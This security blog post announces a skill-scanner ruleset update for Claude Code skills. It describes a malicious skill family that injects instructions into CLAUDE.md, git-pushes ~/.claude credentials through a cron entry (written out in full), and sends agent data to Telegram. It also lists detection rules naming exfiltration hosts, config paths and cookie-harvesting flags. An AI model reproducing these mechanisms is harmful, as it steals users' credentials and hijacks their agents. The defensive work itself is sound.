Security 9 min read

Ruleset v2026.06.05: What 300 Sub-Agent Reviews Revealed

A focused review pass surfaced a malicious publisher family targeting Claude Code config — and a handful of regex rules costing more in false positives than they were worth. Here's what we changed.

We ship the SkillSafe scanner ruleset in two halves: a deterministic Stage 1 (regex + AST patterns producing raw findings) and an AI-driven Stage 2 (sub-agents that classify each finding as threat or advisory and read the actual source files). When findings flow through both stages, the rule set surfaces real attacks while the AI review absorbs the noise. The tradeoff: Stage 2 is the expensive half. Every false positive Stage 1 emits costs review-budget Stage 2 has to spend before it can look at the next item.

Over the past week we drained ~300 items from the scan-review backlog via a sub-agent pipeline. The findings split into two clear piles:

  1. A coordinated family of malicious skills targeting Claude Code’s on-disk config directory — caught by Stage 2 only because the AI noticed the pattern, not the rule that fired.
  2. A long tail of Stage-1 rules that fired ~hundreds of times across legitimate skills without surfacing any real risk.

Today’s ruleset bump — v2026.06.05 (full rule listing) — is the response to both: five new high-precision threat rules covering the publisher-family attack surface, plus systematic false-positive fixes targeting the noisiest rules.

The “claw” publisher family

Across the 300-scan review, one publisher namespace produced four flagged skills and the same architectural signature kept showing up. We’ve consolidated them here so the attack pattern is visible end-to-end:

SkillGradeMechanism
openclaw-backupFHardcoded write of SOUL.md / MEMORY.md / IDENTITY.md to soul-upload.com — a domain not declared in SKILL.md.
clawsec-nanoclawDfs.writeFileSync('/workspace/group/CLAUDE.md', newInstructions) — direct instruction injection into the agent’s CLAUDE.md, plus process.env.HOME + ~/.claude/skills reads for installed-skill reconnaissance.
clawdbot-backupDInstalls both a cron entry (0 */6 * * * git -C ~/.claude add . && git push 2>/dev/null) and a macOS LaunchAgent that silently push the entire ~/.claude tree — MCP credentials, MEMORY.md, every saved skill — to an attacker-controlled remote every 6 hours.
openclaw (parent)DRuntime code that routes “agent observations” to an attacker-configurable Telegram target via INSTALLER_FEED_CHANNEL / INSTALLER_FEED_TARGET_ID. Structurally identical to a surveillance pipeline.

Notice what they have in common: every one of them touches the on-disk Claude Code config directory. ~/.claude/skills is the user’s installed-skill inventory. ~/.claude/mcp/servers.json holds every MCP server credential the user has configured (database connection strings, OAuth tokens, API keys). ~/.claude/CLAUDE.md is the project-level instruction file the agent reads on every invocation. Capturing or modifying any of these gives an attacker durable agent-level access that survives reboots and persists across every future Claude Code session.

The old ruleset caught some of this — agent_memory_write catches > CLAUDE.md shell redirection, persistence_cron catches cron entries, persistence_launchd catches LaunchAgent installation. But the actual attacks bypassed all three:

  • clawsec-nanoclaw used JSfs.writeFileSync(path, contents), not shell redirection. The original rule was shell-only.
  • clawdbot-backup’s persistence was correct, but genericpersistence_cron fires on any cron entry, so it gets buried under hundreds of false positives. There was no rule that said “cron + git + ~/.claude,” which is the actual attack signature.
  • openclaw exfil destination was Telegram — the existing shell_exfil_service rule covers ngrok / requestbin / webhook.site, but Telegram’s API is also a perfectly fine consumer-grade exfiltration channel and wasn’t on the list.

Five new rules

+ agent_memory_write_js     critical  fs.write*(CLAUDE.md|MEMORY.md|SOUL.md|IDENTITY.md|.cursorrules)
+ ai_config_dir_access      high      $HOME/.claude or ~/.claude/{skills,memory,settings,mcp}
+ agent_config_git_push     critical  git push of a path inside ~/.claude or $HOME
+ browser_session_harvest   high      --remote-debugging-port, chrome.cookies, profile cookie reads
+ cp05_comms_exfil_candidate medium   api.telegram.org, discord.com/api/webhooks, hooks.slack.com

Each rule names a specific attack mechanism rather than a generic capability. That’s the design point. The original composite_exec_exfil rule (exec + network in the same file) catches the shape of exfiltration, but on a 50K-skill backlog that shape is also the shape of every legitimate API client. The new rules narrow the surface to “things only malware does.”

cp05_comms_exfil_candidate is a partial exception — Telegram bots and Slack webhooks have many legitimate uses, including in benign skills like feishu-cli-chat and baoyu-post-to-wechat. The rule fires at medium, not high, so AI review verifies whether the host is declared in SKILL.md. If it is, the finding is downgraded to advisory at the Stage-2 step. If it isn’t — like the openclaw INSTALLER_FEED_CHANNEL — it’s a covert side-channel and stays a threat.

The browser_session_harvest rule has a story of its own. It was triggered by tuzi-danger-gemini-web, a skill that read live Google session cookies by attaching to a running Chrome via the Chrome DevTools Protocol debug port. Every destination it talked to was Google-owned — but the user never consented to having their browser session siphoned. The skill name’s “danger” prefix is a transparent disclosure (baoyu publishes a whole danger-* line for reverse-engineered web APIs), but our scanner shouldn’t depend on naming conventions to flag undocumented capability.

False-positive fixes

The other half of v2026.06.05 is about Stage 1 noise. Across 300 sub-agent reviews, six rules accounted for the overwhelming majority of advisory classifications — by which I mean: the rule fired, but the sub-agent read the surrounding code and explained that the rule had no business firing.

The single noisiest pattern: py_compile matching re.compile(). Python’s re.compile() is one of the most common idioms in the language. It has nothing to do with Python’s compile() builtin, which compiles source-code strings into code objects. But the rule was looking for \bcompile\s*\(, and \b matches between . and c, so every re.compile(...) call lit up the scanner. Some skills had 15+ re.compile() calls. Each one became a finding. Three or more medium-severity findings in one file trigger composite_medium_cluster (SS-CP04), which is high. So the cascade went:

15× re.compile()  →  15× py_compile (info)  →  no direct grade impact
                  ↘ contributes to file's finding count
                     →  composite_medium_cluster fires if other meds exist (high)
                        →  inflates A→B grade

The fix is a one-character regex change: (?<!\.)\bcompile\s*\( — don’t match when preceded by a dot. Same fix for py_exec (caught SQLModel’s Session.exec()) and py_eval. That single change probably reclaims more reviewer wall-clock than any other line in this release.

The other systematic fixes:

  • prompt_system_prompt removed entirely. The rule matched the phrase “system prompt” anywhere in a file. The phrase appears in every skill that discusses LLMs as a technical concept — prompt-engineering, claude-api, ai-llm, qa-agent-testing, safety-alignment-nemo-guardrails, and dozens more. Across 300 reviews, it never once surfaced an actual attack. Capability tracking continues through the BOM; the rule itself is gone.

  • XML namespace URIs no longer count as network calls in composite scoring. composite_exec_exfil is supposed to mean “this file does I/O and could ship data out.” Document-processing libraries (.docx, .xlsx, .pptx, ODF) all import XML namespaces — http://openxmlformats.org/wordprocessingml/2006/main, http://www.w3.org/2001/XMLSchema, etc. These are static identifier strings, not endpoints. The scanner now strips them from file content before the composite check runs.

  • composite_env_leak self-consistency. If a script reads BINANCE_API_KEY and only talks to binance.com, the env-var-to-network flow is authentication, not exfiltration. The rule now checks whether the env-var name shares a token with the destination host; when it does, the finding emits at info instead of high. Same logic catches OPENAI_API_KEY → openai.com, EXA_API_KEY → exa.ai, and most other legitimate API client patterns.

  • composite_write_exfil static-asset suppression. Suppressed when the only outbound URLs in the file are from CDN hosts (jsdelivr, unpkg, googleapis, gstatic, fontawesome, bootstrapcdn). Chart.js inside an HTML template is not an exfiltration channel.

  • dangerous_rm_root dev-cache whitelist. The original whitelist covered rm -f ~/.app/file (specific dotfile cleanup). It missed all the recursive cache deletions that Xcode, Gradle, npm, yarn, Cargo, and pip troubleshooting docs recommend — rm -rf ~/Library/Developer/Xcode/DerivedData/, rm -rf ~/.gradle/caches/, etc. Extended to cover them.

  • path_traversal_sys defensive context. The rule fired on ../../etc/passwd strings even when they appeared in security checklists explicitly teaching what not to do. Now suppressed when ±2 surrounding lines contain defensive language (do not, avoid, vulnerable, attacker, anti-pattern, , ⚠️).

  • unicode_zero_width emoji ZWJ allowance. U+200D (zero-width joiner) is what makes 👩‍🚒 render as one glyph instead of three. The rule now suppresses when the only zero-width character on the line is ZWJ and the line otherwise contains emoji-range codepoints.

What stays the same

The risk model is unchanged. v2026.06.05 doesn’t relax any threshold or weaken any threat detection — it adds new high-precision rules and removes rules that were producing pure noise. A skill that was graded A under the previous ruleset will be graded A or better under this one. A skill that was graded F (like openclaw-backup) will keep failing, and several skills that should have been graded D under the old rules but slipped through (like clawsec-nanoclaw’s JS-side CLAUDE.md write) will now fail at Stage 1.

The deterministic-then-AI architecture is the same too. Stage 1 produces raw findings. Stage 2 classifies each one as threat or advisory and grades the skill. The change is that Stage 1 is now better at naming what it found, and Stage 2 has fewer red herrings to triage. Each Stage 2 review now reads ~6 findings on average instead of ~15.

What to do if you publish skills

If your skill currently passes the SkillSafe scan, you do not need to do anything. If it currently fails on one of the rules we fixed (most commonly py_compile matching re.compile(), or prompt_system_prompt firing on documentation), re-scan and you’ll likely pass. The new threat rules (agent_memory_write_js, ai_config_dir_access, agent_config_git_push, browser_session_harvest) only fire on patterns that legitimate skills do not use; if you maintain a backup or sync utility for ~/.claude and need to write to it, declare it explicitly in SKILL.md and the AI review will downgrade the finding to advisory.

Full rule listing: /security/ruleset_v2026.06.05/.

If you find a flagged skill in the registry that you believe is a false positive — or, more usefully, a real attack that’s somehow still graded clean — open an issue at the SkillSafe GitHub repo and we’ll look at it.